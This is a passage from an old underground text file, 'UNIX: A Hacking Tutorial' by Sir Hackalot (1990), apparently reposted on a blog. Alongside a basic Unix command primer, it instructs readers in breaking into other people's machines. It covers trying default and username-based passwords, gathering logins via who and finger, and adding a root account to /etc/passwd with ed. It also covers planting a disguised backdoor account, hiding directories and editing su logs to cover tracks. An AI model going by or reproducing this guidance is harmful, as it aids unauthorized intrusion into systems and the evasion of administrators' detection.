The "" are NEEDED to get to the directory .. ! It will not show
up in a listing, and it is hard as hell to get to by sysadms if
you make 4 or 5 spaces in there (".. "), because all they will
see in a directory FULL list will be .. and they won't be able to
get there unless they use "" and know the spacing. "" is used
when you want to do literals, or use a wildcard as part of a file
name.
16. Don't hog cpu time with password hackers. They really don't work
well.

17. Don't use too much disk space. If you archieve something to dl,
dl it, then kill the archieve.
18. Basically -- COVER YOUR TRACKS.

Some final notes:

Now, I hear lots of rumors and stories like "It is getting harder to get
into systems...". Wrong. (Yo Pheds! You reading this??). It IS true
when you are dealing with WAN's, such as telenet, tyment, and the Internet,
but not with local computers not on those networks. Here's the story:

Over the past few years, many small companies have sprung up as VARs
(Value Added Resellers) for Unix and Hardware, in order to make a fast
buck. Now, these companies fast talk companies into buying whatever,
and they proceed in setting up the Unix. Now, since they get paid by
the hour usaually when setting one up, they spread it out over days....
during these days, the system is WIDE open (if it has a dialin). Get
in and add yourself to passwd before the seal it off (if they do..).
Then again, after the machine is set up, they leave the defaults on the
system. Why? The company needs to get in, and most VARs cannot use
unix worth a shit, all they know how to do is set it up, and that is ALL.
Then, they turn over the system to a company or business that USUALLY
has no-one that knows what they hell they are doing with the thing, except
with menus. So, they leave the system open to all...(inadvertedly..),
because they are not competant. So, you could usually get on, and create
havoc, and at first they will think it is a bug.. I have seen this
happen ALL to many times, and it is always the same story...
The VAR is out for a fast buck, so they set up the software (all they know
how to do), and install any software packages ordered with it (following
the step by step instructions). Then they turn it over to the business
who runs a word processor, or database, or something, un aware that a
"shell" or command line exists, and they probably don't even know root does.
So, we will see more and more of these pop up, especially since AT&T is
now bundling a version of Xwindows with their new System V, and Simultask...
which will lead to even more holes. You'll find systems local to you
that are easy as hell to get into, and you'll see what I mean. These
VARs are really actually working for us. If a security problem arises
that the business is aware of, they call the VAR to fix it... Of course,
the Var gets paid by the hour, and leaves something open so you'll get in
again, and they make more moolahhhh.

You can use this phile for whatever you want. I can't stop you. Just
to learn unix (heh) or whatever. But its YOUR ass if you get caught.
Always consider the penalties before you attempt something. Sometimes
it is not worth it, Sometimes it is.

This phile was not meant to be comprehensive, even though it may seem like
it. I have left out a LOT of techniques, and quirks, specifically to get
you to learn SOMETHING on your own, and also to retain information so
I will have some secrets. You may pass this file on, UNMODIFIED, to any
GOOD H/P BBS. Sysops can add things to the archieve to say where
it was DL'd from, or to the text viewer for the same purpose. This is
Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.
1990.

UNIX : A Hacking Tutorial part II

2009-02-07T19:31:00.001-06:00

The accounts root, mountfsys, umountfsys, install, and sometimes sync are
root level accounts, meaning they have sysop power, or total power. Other
logins are just "user level" logins meaning they only have power over what
files/processes they own. I'll get into that later, in the file permissions
section. The REBOOT login is what as known as a command login, which just
simply doesn't let you into the operating system, but executes a program
assigned to it. It usually does just what it says, reboot the system. It
may not be standard on all UNIX systems, but I have seen it on UNISYS unixes
and also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts have
not been passworded [reboot], which is real stupid, if you ask me.

COMMAND LOGINS:
---------------

There are "command logins", which, like reboot, execute a command then log
you off instead of letting you use the command interpreter. BSD is notorious
for having these, and concequently, so does MIT's computers. Here are some:

rwho - show who is online
finger - same
who - same

These are the most useful, since they will give the account names that are
online, thus showing you several accounts that actually exist.

Errors:
-------

When you get an invalid Account name / invalid password, or both, you will
get some kind of error. Usually it is the "login incorrect" message. When
the computer tells you that, you have done something wrong by either enterring
an invalid account name, or a valid account name, but invalid password. It
does not tell you which mistake you made, for obvious reasons. Also,
when you login incorrectly, the error log on the system gets updated, letting
the sysops(s) know something is amiss.

Another error is "Cannot change to home directory" or "Cannot Change
Directory." This means that no "home directory" which is essentially the
'root' directory for an account, which is the directory you start off in.
On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in
/homedirectory. [Note: The / is used in directories on UNIX, not a \ ].
Most systems will log you off after this, but some tell you that they will
put you in the root directory [ '/'].

Another error is "No Shell". This means that no "shell" was defined
for that particular account. The "shell" will be explained later. Some
systems will log you off after this message. Others will tell you that they
will use the regular shell, by saying "Using the bourne shell", or "Using sh"

-----------------------------
Accounts In General :
-----------------------------

This section is to hopefully describe to you the user structure
in the UNIX environment.
Ok, think of UNIX having two levels of security: absolute power,
or just a regular user. The ones that have absolute power are those users
at the root level. Ok, now is the time to think in numbers. Unix associates
numbers with account names. each account will have a number. Some will have
the same number. That number is the UID [user-id] of the account. the root
user id is 0. Any account that has a user id of 0 will have root access.
Unix does not deal with account names (logins) but rather the number
associated with them. for instance, If my user-id is 50, and someone else's
is 50, with both have absolute power of each other, but no-one else.
_____________________________________________________________________________

---------------
Shells :
---------------

A shell is an executable program which loads and runs when a user
logs on, and is in the foreground. This "shell" can be any executable prog-
ram, and it is defined in the "passwd" file which is the userfile. Each
login can have a unique "shell". Ok. Now the shell that we usually will work
with is a command interpreter. A command interpreter is simply something
like MSDOS's COMMAND.COM, which processes commands, and sends them to the
kernel [operating system]. A shell can be anything, as I said before,
but the one you want to have is a command interpreter. Here are the
usual shells you will find:

sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has
a "script" language, as do most of the command interpreters on Unix sys-
tems.

csh - This is the "C" shell, which will allow you to enter "C" like commands.
ksh - this is the korn shell. Just another command interpreter.
tcsh - this is one, which is used at MIT I believe. Allows command editing.
vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS
rsh - restricted shell OR remote shell. Both Explained later.
There are many others, including "homemade " shells, which are
programs written by the owner of a unix, or for a specific unix, and they
are not standard. Remember, the shell is just the program you get to use
and when it is done executing, you get logged off. A good example of a
homemade shell is on Eskimo North, a public access Unix. The shell
is called "Esh", and it is just something like a one-key-press BBS,
but hey, its still a shell. The Number to eskimo north is 206-387-3637.
[206-For-Ever]. If you call there, send Glitch Lots of mail.
Several companies use Word Processors, databases, and other things
as a user shell, to prevent abuse, and make life easier for unskilled computer
operators. Several Medical Hospitals use this kind of shell in Georgia,
and fortunatly, these second rate programs leave major holes in Unix.
Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, they
give you a choice between a command interpreter, or a BBS as a shell.
WHen you have a command interpreter, the prompt is usually a:
$
when you are a root user the prompt is usually a:
#
The variable, PS1, can be set to hold a prompt.
For instance, if PS1 is "HI:", your prompt will be:
HI:

_____________________________________________________________________________

------------------------
SPecial Characters, ETc:
------------------------

Control-D : End of file. When using mail or a text editor, this will end
the message or text file. If you are in the shell and hit control-d you get
logged off.

Control-J: On some systems, this is like the enter key.
@ : Is sometimes a "null"
? : This is a wildcard. This can represent a letter. If you specified
something at the command line like "b?b" Unix would look for bob,bib,bub,
and every other letter/number between a-z, 0-9.
* : this can represent any number of characters. If you specified a "hi*"
it would use "hit", him, hiiii, hiya, and ANYTHING that starts with
hi. "H*l" could by hill, hull, hl, and anything that starts with an
H and ends with an L.

[] - The specifies a range. if i did b[o,u,i]b unix would think: bib,bub,bob
if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb. Get the idea? The
[], ?, and * are usually used with copy, deleting files, and directory
listings.

EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not
the same thing. This allows for many files to be able to be stored, since
"Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when using
the [] stuff, you have to specify capital letters if any files you are dealing
with has capital letters. Most everything is lower case though.

----------------
Commands to use:
----------------

Now, I will rundown some of the useful commands of Unix. I will act
as if I were typing in the actual command from a prompt.

ls - this is to get a directory. With no arguments, it will just print out
file names in either one column or multi-column output, depending on the
ls program you have access to.

example:
$ ls
hithere
runme
note.text
src
$
the -l switch will give you extended info on the files.
$ ls -l
rwx--x--x sirhack sirh 10990 runme
and so on....

the "rwx--x--x" is the file permission. [Explained Later]
the "sirhack sirh" is the owner of the file/group the file is in.
sirhack = owner, sirh = user-group the file is in [explained later]
the 10990 is the size of the file in bytes.
"runme" is the file name.
The format varies, but you should have the general idea.

cat - this types out a file onto the screen. should be used on text files.
only use it with binary files to make a user mad [explained later]
ex:
$ cat note.txt
This is a sample text file!
$

cd - change directory . You do it like this: cd /dir/dir1/dir2/dirn.
the dir1/etc.... describes the directory name. Say I want to get
to the root directory.
ex:
$ cd /
*ok, I'm there.*
$ ls
bin
sys
etc
temp
work
usr
all of the above are directories, lets say.
$ cd /usr
$ ls
sirhack
datawiz
prophet
src
violence
par
phiber
scythian
$ cd /usr/sirhack
$ ls
hithere
runme
note.text
src
$
ok, now, you do not have to enter the full dir name. if you are in
a directory, and want to get into one that is right there [say "src"], you
can type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from the
sirhack dir, you can type "cd src"

cp - this copies a file. syntax for it is "cp fromfile tofile"
$ cp runme runme2
$ ls
hithere
runme
note.text
src
runme2
Full pathnames can be included, as to copy it to another directory.
$ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
$ mv runme2 runit
$ ls
hithere
runme
note.text
src
runit
files can be renamed into other directories.
$ mv runit /usr/datwiz/run
$ ls
hithere
runme
note.text
src
$ ls /usr/datwiz
runme
run

pwd - gives current directory
$ pwd
/usr/sirhack
$ cd src
$ pwd
/usr/sirhack/src
$ cd ..
$ pwd
/usr/sirhack
[ the ".." means use the name one directory back. ]
$ cd ../datwiz
[translates to cd /usr/datwiz]
$ pwd
/usr/datwiz
$ cd $home
[goto home dir]
$ pwd
/usr/sirhack

rm - delete a file. syntax "rm filename" or "rm -r directory name"
$ rm note.text
$ ls
hithere
runme
src
$

write - chat with another user. Well, "write" to another user.
syntax: "write username"
$ write scythian
scythian has been notified
Hey Scy! What up??
Message from scythian on tty001 at 17:32
hey!
me: So, hows life?
scy: ok, I guess.
me: gotta go finish this text file.
scy: ok
me: control-D [to exit program]
$

who [w,who,whodo] - print who is online
$ who
login term logontime
scythian + tty001 17:20
phiberO + tty002 15:50
sirhack + tty003 17:21
datawiz - tty004 11:20
glitch - tty666 66:60
$
the "who" commands may vary in the information given. a "+" means
you can "write" to their terminal, a "-" means you cannot.

man - show a manual page entry. syntax "man command name" This is a help
program. If you wanted to know how to use... "who" you'd type
$ man who
WHO(1) xxx......
and it would tell you.

stty - set your terminal characteristics. You WILL have to do "man stty"
since each stty is different, it seems like.
an example would be:
$ stty -parenb
to make the data params N,8,1. A lot of Unixes operate at
e,7,1 by default.

sz,rz - send and recieve via zmodem
rx,sx - send / recieve via xmodem
rb,sb - send via batch ymodem. These 6 programs may or may not be on a unix.
umodem - send/recieve via umodem.
$ sz filename
ready to send...
$ rz filename
please send your file....
...etc..

ed - text editor. Usage "ed filename" to create a file that doesn't
exist, just enter in "ed filename"
some versions of ed will give you a prompt, such as "*" others will not
$ ed newtext
0
* a
This is line 1
This is line 2
[control-z]
* 1 [to see line one]
This is line 1
* a [keep adding]
This is line 3
[control-z]
*0a [add after line 0]
This is THE first line
[control-z]
1,4l
This is THE first line
This is line 1
This is line 2
This is line 3
* w
71
* q
$
The 71 is number of bytes written.
a = append
l = list
# = print line number
w - write
l fname = load fname
s fname = save to fname
w = write to current file
q = quit
mesg - turn write permissions on or off to your terminal (allow chat)
format "mesg y" or "mesg n"
cc - the C compiler. don't worry about this one right now.
chmod - change mode of a file. Change the access in other words.
syntax: "chmod mode filename"
$ chmod a+r newtext
Now everyone can read newtext.
a = all
r = read. This will be explained further in the File System section.

chown - change the owner of a file.
syntax: "chown owner filename"
$ chown scythian newtext
$
chgrp - change the group [explained later] of a file.
syntax: "chgrp group file"
$ chgrp root runme
$
finger - print out basic info on an account. Format: finger username
grep - search for patterns in a file. syntax: "grep pattern file"
$ grep 1 newtext
This is Line 1
$ grep THE newtext
This is THE first line
$ grep "THE line 1" newtext
$

mail - This is a very useful utility. Obviously, you already know what it
is by its name. There are several MAIL utilities, such as ELM, MUSH
and MSH, but the basic "mail" program is called "mail". The usage
is:
"mail username@address" or
"mail username"
or
"mail"
or "mail addr1!addr2!addr3!user"

"mail username@address" - This is used to send mail to someone on
another system, which is usually another UNIX, but some DOS machines and some
VAX machines can recieve Unix Mail. When you use "mail user@address" the
system you are on MUST have a "smart mailer" [known as smail], and must
have what we call system maps. The smart mailer will find the "adress" part
of the command and expand it into the full pathname usually. I could look
like this: mail phiber@optik
then look like this to the computer:

mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Do not worry about it, I was merely explaining the principal of the thing.
Now, if there is no smart mailer online, you'll have to know the FULL path
name of the person you wish to mail to. For Instance, I want to mail to
.. phiber. I'd do this if there were no smart mailer:

$ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Hey Guy. Whats up? Well, gotta go. Nice long message huh?
[control-D]
$
Then, when he got it, there would be about 20 lines of information, with
like a post mark from every system my message went thru, and the "from" line
would look like so:

From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack

Now, for local mailing, just type in "mail username" where username
is the login you want to send mail to. Then type in your message. Then
end it with a control-D.

To read YOUR mail, just type in mail. IE:

$ mail

From scythian ............
To sirhack ............
Subject: Well....

Arghhh!

?
The dots represent omitted crap. Each Mail program makes its own headings.
That ? is a prompt. At this prompt I can type:

d - delete
f username - forward to username
w fname - write message to a file named fname
s fname - save message with header into file
q - quit / update mail
x - quit, but don't change a thing
m username - mail to username
r - reply
[enter] - read next message
+ - go forward one message
- : go back one
h - print out message headers that are in your mailbox.

There are others, to see them, you'd usually hit '?'.

--------

If you send mail to someone not on your system, you will have to wait longer
for a reply, since it is just as a letter. A "postman" has to pick it up.
The system might call out, and use UUCP to transfer mail. Usually, uucp
accounts are no good to one, unless you have uucp available to intercept mail.

ps - process. This command allows you to see what you are actually doing
in memory. Everytime you run a program, it gets assigned a Process Id number
(PID), for accounting purposes, and so it can be tracked in memory, as
well as shut down by you, or root. usually, the first thing in a process
list given by "ps" is your shell name. Say I was logged in under sirhack,
using the shell "csh" and running "watch scythian". The watch program would
go into the background, meaning I'd still be able to do things while it was
running:
$ ps
PID TTY NAME
122 001 ksh
123 001 watch
$
That is a shortened PS. That is the default listing [a brief one].
The TTY column represents the "tty" [i/o device] that the process is being
run from. This is only useful really if you are using layers (don't worry)
or more than one person is logged in with the same account name. Now,
"ps -f" would give a full process listing on yourself, so instead of
seeing just plain ole "watch" you'd most likely see "watch scythian"

kill - kill a process. This is used to terminate a program in memory obvio-
ously. You can only kill processes you own [ones you started], unless you
are root, or your EUID is the same as the process you want to kill.
(Will explain euid later). If you kill the shell process, you are logged
off. By the same token, if you kill someone else's shell process, they
are logged off. So, if I said "kill 122" I would be logged off. However,
kill only sends a signal to UNIX telling it to kill off a process. If
you just use the syntax "kill pid" then UNIX kills the process WHEN it feels
like it, which may be never. So, you can specify urgency! Try "kill -num pid"
Kill -9 pid is a definite kill almost instantly. So if I did this:
$ kill 122
$ kill 123
$ ps
PID TTY NAME
122 001 ksh
123 001 watch
$ kill -9 123
[123]: killed
$ kill -9 122
garbage
NO CARRIER

Also, you can do "kill -1 0" to kill your shell process to log yourself off.
This is useful in scripts (explained later).

-------------------
Shell Programmin'
-------------------

Shell Programming is basically making a "script" file for the
standard shell, being sh, ksh, csh, or something on those lines. Its
like an MSDOS batch file, but more complex, and more Flexible.
This can be useful in one aspect of hacking.

First, lets get into variables. Variables obviously can be assigned
values. These values can be string values, or numberic values.

number=1

That would assign 1 to the variable named "number".

string=Hi There
or
string="Hi There"

Both would assign "Hi there" to a variable.

Using a variable is different though. When you wish to use a variable
you must procede it with a dollar ($) sign. These variables can
be used as arguments in programs. When I said that scripts are
like batch files, I meant it. You can enter in any name of a program
in a script file, and it will execute it. Here is a sample script.

counter=1
arg1="-uf"
arg2="scythian"

ps $arg1 $arg2

echo $counter

That script would translate to "ps -uf scythian" then would print
"1" after that was finished. ECHO prints something on the screen
whether it be numeric, or a string constant.

Other Commands / Examples:

read - reads someting into a variable. format : read variable . No dollar
sign is needed here! If I wwanted to get someone's name, I could
put:

echo "What is your name?"
read hisname
echo Hello $hisname

What is your name?
Sir Hackalot
Hello Sir Hackalot

Remember, read can read numeric values also.

trap - This can watch for someone to use the interrupt character. (Ctrl-c)
format: trap "command ; command ; command ; etc.."
Example:
trap "echo 'Noway!! You are not getting rid o me that easy' ; echo
'You gotta see this through!'"

Now, if I hit control-c during the script after this statement was
executed, I'd get:
Noway!! You are not getting rid of me that easy
You gotta see this through!

exit : format :exit [num] This exists the shell [quits] with return
code of num.

-----
CASE
-----

Case execution is like a menu choice deal. The format of the command
or structure is :
case variable in
1) command;
command;;
2) command;
command;
command;;
*) command;;
esac
Each part can have any number of commands. The last command however
must have a ";;". Take this menu:

echo "Please Choose:"
echo "(D)irectory (L)ogoff (S)hell"
read choice
case $choice in

D) echo "Doing Directory...";
ls -al ;;
L) echo Bye;
kill -1 0;;
S) exit;;
*) Echo "Error! Not a command";;
esac

The esac marks the end of a case function. It must be after the
LAST command.

Loops
-----

Ok, loops. There are two loop functins. the for loops, and the
repeat.

repeat looks like this: repeat something somethin1 somethin2
this would repeat a section of your script for each "something".
say i did this:
repeat scythian sirhack prophet

I may see "scythian" then sirhack then prophet on my screen.

The for loop is defined as "for variable in something
do
..
..
done"

an example:
for counter in 1 2 3
do
echo $counter
done

That would print out 1 then 2 then 3.

Using TEST
----------
The format: Test variable option variable

The optios are:
-eq =
-ne <> (not equal)
-gt >
-lt < -ge >=
-le <= for strings its: = for equal != for not equal. If the condition is true, a zero is returned. Watch: test 3 -eq 3 that would be test 3 = 3, and 0 would be returned. EXPR ---- This is for numeric functions. You cannot simply type in echo 4 + 5 and get an answer most of the time. you must say: expr variable [or number] operator variable2 [or number] the operators are: + add - subtract * multiply / divide ^ - power (on some systems) example : expr 4 + 5 var = expr 4 + 5 var would hold 9. On some systems, expr sometimes prints out a formula. I mean, 22+12 is not the same as 22 + 12. If you said expr 22+12 you would see: 22+12 If you did expr 22 + 12 you'd see: 34 SYSTEM VARIABLES ---------------- These are variables used by the shell, and are usually set in the system wide .profile [explained later]. HOME - location of your home directory. PS1 - The prompt you are given. usually $ . On BSD its usually & PATH - This is the search path for programs. When you type in a program to be run, it is not in memory; it must be loaded off disk. Most commands are not in Memory like MSDOS. If a program is on the search path, it may be executed no matter where you are. If not, you must be in the directory where the program is. A path is a set of directories basically, seperated by ":"'s. Here is a typical search path: :/bin:/etc:/usr/lbin:$HOME: When you tried to execute a program, Unix would look for it in /bin, /etc, /usr/lbin, and your home directory, and if its not found, an error is spewed out. It searches directories in ORDER of the path. SO if you had a program named "sh" in your home directory, and typed in "sh", EVEN if you were in your home dir, it would execute the one in /bin. So, you must set your paths wisely. Public access Unixes do this for you, but systems you may encounter may have no path set. TERM - This is your terminal type. UNIX has a library of functions called "CURSES" which can take advantage of any terminal, provided the escape codes are found. You must have your term set to something if you run screen oriented programs. The escape codes/names of terms are found in a file called TERMCAP. Don't worry about that. just set your term to ansi or vt100. CURSES will let you know if it cannot manipulate your terminal emulation. ------------------- The C compiler ------------------- This Will be BRIEF. Why? Becuase if you want to learn C, go buy a book. I don't have time to write another text file on C, for it would be huge. Basically, most executables are programmed in C. Source code files on unix are found as filename.c . To compile one, type in "cc filename.c". Not all C programs will compile, since they may depend on other files not there, or are just modules. If you see a think called "makefile" you can usually type in just "make" at the command prompt, and something will be compiled, or be attempted to compile. When using make or CC, it would be wise to use the background operand since compiling sometimes takes for ever. IE: $ cc login.c& [1234] $ (The 1234 was the process # it got identified as). _____________________________________________________________________________ --------------- The FILE SYSTEM --------------- This is an instrumental part of UNIX. If you do not understand this section, you'll never get the hang of hacking Unix, since a lot of Pranks you can play, and things you can do to "raise your access" depend on it. First, Let's start out by talking about the directory structure. It is basically a Hiearchy file system, meaning, it starts out at a root directory and expands, just as MSDOS, and possibly AmigaDos. Here is a Directory Tree of sorts: (d) means directory / (root dir) | |--------------------| bin (d) usr (d) ----^-------------------- | | | sirhack(d) scythian (d) prophet (d) | src (d) Now, this particular system contains the following directories: / /bin /usr /usr/sirhack /usr/sirhack/src /usr/scythian /usr/prophet Hopefully, you understood that part, and you should. Everything spawns from the root directory. o File Permissions! ------------------ Now, this is really the biggie. File Permissions. It is not that hard to understand file permissions, but I will explain them deeply anyway. OK, now you must think of user groups as well as user names. Everyone belongs to a group. at the $ prompt, you could type in 'id' to see what group you are in. Ok, groups are used to allow people access certain things, instead of just having one person controlling/having access to certain files. Remember also, that Unix looks at someone's UID to determine access, not user name. Ok. File permissions are not really that complicated. Each file has an owner This OWNER is usually the one who creates the file, either by copying a file or just by plain editing one. The program CHOWN can be used to give someone ownership of a file. Remember that the owner of a file must be the one who runs CHOWN, since he is the only one that can change the permissions of a file Also, there is a group owner, which is basically the group that you were in when the file was created. You would use chgrp to change the group a file is in. Now, Files can have Execute permissions, read permissions, or write permission. If you have execute permission, you know that you can just type in the name of that program at the command line, and it will execute. If you have read permission on a file, you can obviously read the file, or do anything that reads the file in, such as copying the file or cat[ing] it (Typing it). If you do NOT have access to read a file, you can't do anything that requires reading in the file. This is the same respect with write permission. Now, all the permissions are arranged into 3 groups. The first is the owner's permissions. He may have the permissions set for himself to read and execute the file, but not write to it. This would keep him from deleting it. The second group is the group permissions. Take an elongated directory for an example: $ ls -l runme r-xrwxr-- sirhack root 10990 March 21 runme ok. Now, "root" is the groupname this file is in. "sirhack" is the owner. Now, if the group named 'root' has access to read, write and execute, they could do just that. Say .. Scythian came across the file, and was in the root user group. He could read write or execute the file. Now, say datawiz came across it, but was in the "users" group. The group permissions would not apply to him, meaning he would have no permissions, so he couldn't touch the file, right? Sorta. There is a third group of permissions, and this is the "other" group. This means that the permissions in the "other" group apply to everyone but the owner, and the users in the same group as the file. Look at the directory entry above. the r-x-rwxr-- is the permissions line. The first three characters are the permissions for the owner (r-x). The "r-x" translates to "Read and execute permissions, but no write permissions" the second set of three, r-xRWXr-- (the ones in capital letters) are the group permissions. Those three characters mean "Read, write, and execution allowed" The 3rd set, r-xrwxR-- is the permissions for everyone else. It means "Reading allowed, but nothing else". A directory would look something like this: $ ls -l drwxr-xr-x sirhack root 342 March 11 src A directory has a "d" at the beggining of the permissions line. Now, the owner of the directory (sirhack) can read from the directory, write in the directory, and execute programs from the directory. The root group and every- one else can only read from the directory, and execute off the directory. So, If I changed the directory to be executable only, this is what it would look like: $ chmod go-r $ ls drwx--x--x sirhack root 342 March 11 src Now, if someone went into the directory besides "sirhack", they could only execute programs in the directory. If they did an "ls" to get a directory of src, when they were inside src, it would say "cannot read directory". If there is a file that is readable in the directory, but the directory is not readable, it is sometimes possible to read the file anyway. If you do not have execute permissions in a directory, you won't be able to execute anything in the directory, most of the time. _____________________________________________________________________________ -------------- Hacking: -------------- The first step in hacking a UNIX is to get into the operating system by finding a valid account/password. The object of hacking is usually to get root (full privileges), so if you're lucky enough to get in as root, you need not read anymore of this hacking phile , and get into the "Having Fun" Section. Hacking can also be just to get other's accounts also. Getting IN ---------- The first thing to do is to GET IN to the Unix. I mean, get past the login prompt. That is the very first thing. When you come across a UNIX, sometimes it will identify itself by saying something like, "Young INC. Company UNIX" or Just "Young Inc. Please login" Here is where you try the defaults I listed. If you get in with those you can get into the more advanced hacking (getting root). If you do something wrong at login, you'll get the message "login incorrect" This was meant to confuse hackers, or keep the wondering. Why? Well, you don't know if you've enterred an account that does not exist, or one that does exist, and got the wrong password. If you login as root and it says "Not on Console", you have a problem. You have to login as someone else, and use SU to become root. Now, this is where you have to think. If you cannot get in with a default, you are obviously going to have to find something else to login as. Some systems provide a good way to do this by allowing the use of command logins. These are ones which simply execute a command, then logoff. However, the commands they execute are usually useful. For instance there are three common command logins that tell you who is online at the present time. They are: who rwho finger If you ever successfully get one of these to work, you can write down the usernames of those online, and try to logon as them. Lots of unsuspecting users use there login name as their password. For instance, the user "bob" may have a password named "bob" or "bob1". This, as you know, is not smart, but they don't expect a hacking spree to be carried out on them. They merely want to be able to login fast. If a command login does not exist, or is not useful at all, you will have to brainstorm. A good thing to try is to use the name of the unix that it is identified as. For instance, Young INC's Unix may have an account named "young" Young, INC. Please Login. login: young UNIX SYSTEM V REL 3.2 (c)1984 AT&T.. .. .. .. Some unixes have an account open named "test". This is also a default, but surprisingly enough, it is sometimes left open. It is good to try to use it. Remember, brainstorming is the key to a unix that has no apparent defaults open. Think of things that may go along with the Unix. type in stuff like "info", "password", "dial", "bbs" and other things that may pertain to the system. "att" is present on some machines also. ONCE INSIDE -- SPECIAL FILES ---------------------------- There are several files that are very important to the UNIX environment. They are as follows: /etc/passwd - This is probably the most important file on a Unix. Why? well, basically, it holds the valid usernames/passwords. This is important since only those listed in the passwd file can login, and even then some can't (will explain). The format for the passwordfile is this: username:password:UserID:GroupID:description(or real name):homedir:shell Here are two sample entries: sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh demo::101:100:Test Account:/usr/demo:/usr/sh In the first line, sirhack is a valid user. The second field, however, is supposed to be a password, right? Well, it is, but it's encrypted with the DES encryption standard. the part that says "&a,Ty" may include a date after the comma (Ty) that tells unix when the password expires. Yes, the date is encrypted into two alphanumeric characters (Ty). In the Second example, the demo account has no password. so at Login, you could type in: login: demo UNIX system V (c)1984 AT&T .. .. But with sirhack, you'd have to enter a password. Now, the password file is great, since a lot of times, you;ll be able to browse through it to look for unpassworded accounts. Remember that some accounts can be restricted from logging in, as such: bin:*:2:2:binaccount:/bin:/bin/sh The '*' means you won't be able to login with it. Your only hope would be to run an SUID shell (explained later). A note about the DES encryption: each unix makes its own unique "keyword" to base encryption off of. Most of the time its just random letters and numbers. Its chosen at installation time by the operating system. Now, decrypting DES encrypted things ain't easy. Its pretty much impossible. Especially decrypting the password file (decrypting the password field within the password file to be exact). Always beware a hacker who says he decrypted a password file. He's full of shit. Passwords are never decrypted on unix, but rather, a system call is made to a function called "crypt" from within the C language, and the string you enter as the password gets encrypted, and compared to the encrypted password. If they match, you're in. Now, there are password hackers, but they donot decrypt the password file, but rather, encrypt words from a dictionary and try them against every account (by crypting/comparing) until it finds a match (later on!). Remember, few, if none, have decrypted the password file successfuly. /etc/group - This file contains The valid groups. The group file is usually defined as this: groupname:password:groupid:users in group Once again, passwords are encrypted here too. If you see a blank in the password entry you can become part of that group by using the utility "newgrp". Now, there are some cases in which even groups with no password will allow only certain users to be assigned to the group via the newgrp command. Usually, if the last field is left blank, that means any user can use newgrp to get that group's access. Otherwise, only the users specified in the last field can enter the group via newgrp. Newgrp is just a program that will change your group current group id you are logged on under to the one you specify. The syntax for it is: newgrp groupname Now, if you find a group un passworded, and use newgrp to enter it, and it asks for a password, you are not allowed to use the group. I will explain this further in The "SU & Newgrp" section. /etc/hosts - this file contains a list of hosts it is connected to thru a hardware network (like an x.25 link or something), or sometimes just thru UUCP. This is a good file when you are hacking a large network, since it tells you systems you can use with rsh (Remote Shell, not restricted shell), rlogin, and telnet, as well as other ethernet/x.25 link programs. /usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in Several directories, but it is usually in /usr/adm. This file is what it sounds like. Its a log file, for the program SU. What it is for is to keep a record of who uses SU and when. whenever you use SU, your best bet would be to edit this file if possible, and I'll tell you how and why in the section about using "su". /usr/adm/loginlog or /usr/adm/acct/loginlog - This is a log file, keeping track of the logins. Its purpose is merely for accounting and "security review". Really, sometimes this file is never found, since a lot of systems keep the logging off. /usr/adm/errlog or errlog - This is the error log. It could be located anywhere. It keeps track of all serious and even not so serious errors. Usually, it will contain an error code, then a situation. the error code can be from 1-10, the higher the number, the worse the error. Error code 6 is usually used when you try to hack. "login" logs your attempt in errlog with error code 6. Error code 10 means, in a nutshell, "SYSTEM CRASH". /usr/adm/culog - This file contains entries that tell when you used cu, where you called and so forth. Another security thing. /usr/mail/ - this is where the program "mail" stores its mail.
to read a particular mailbox, so they are called,
you must be that user, in the user group "mail" or
root. each mailbox is just a name. for instance,
if my login was "sirhack" my mail file would usually
be: /usr/mail/sirhack

/usr/lib/cron/crontabs - This contains the instructions for cron, usually.
Will get into this later.

/etc/shadow - A "shadowed" password file. Will talk about this later.

-- The BIN account --

Well, right now, I'd like to take a moment to talk about the account
"bin". While it is only a user level account, it is very powerful. It is
the owner of most of the files, and on most systems, it owns /etc/passwd,
THE most important file on a unix. See, the bin account owns most of the
"bin" (binary) files, as well as others used by the binary files, such
as login. Now, knowing what you know about file permissions, if bin owns
the passwd file, you can edit passwd and add a root entry for yourself.
You could do this via the edit command:
$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
{control-d}
* w
* q
$

Then, you could say: exec login, then you could login as sirhack, and
you'd be root.

/\/\/\/\/\/\/\/\/
Hacking..........
/\/\/\/\/\/\/\/\/

--------------
Account Adding
--------------

There are other programs that will add users to the system, instead
of ed. But most of these programs will NOT allow a root level user to be
added, or anything less than a UID of 100. One of these programs is
named "adduser". Now, the reason I have stuck this little section in, is
for those who want to use a unix for something useful. Say you want a
"mailing address". If the unix has uucp on it, or is a big college,
chances are, it will do mail transfers. You'll have to test the unix
by trying to send mail to a friend somewhere, or just mailing yourself.
If the mailer is identified as "smail" when you mail yourself (the program
name will be imbedded in the message) that probably means that the system
will send out UUCP mail. This is a good way to keep in contact with people.
Now, this is why you'd want a semi-permanent account. The way to achieve this
is by adding an account similar to those already on the system. If all the
user-level accounts (UID >= 100) are three letter abbriviations, say
"btc" for Bill The Cat, or "brs" for bill ryan smith, add an account
via adduser, and make a name like sally jane marshall or something
(they don't expect hackers to put in female names) and have the account
named sjm. See, in the account description (like Mr. Hackalot above), that
is where the real name is usually stored. So, sjm might look like this:
sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh
Of course, you will password protect this account, right?
Also, group id's don't have to be above 100, but you must put the account
into one that exists. Now, once you login with this account, the first
thing you'd want to do is execute "passwd" to set a password up. If you
don't, chances are someone else 'll do it for you (Then you'll be SOL).

-------------------
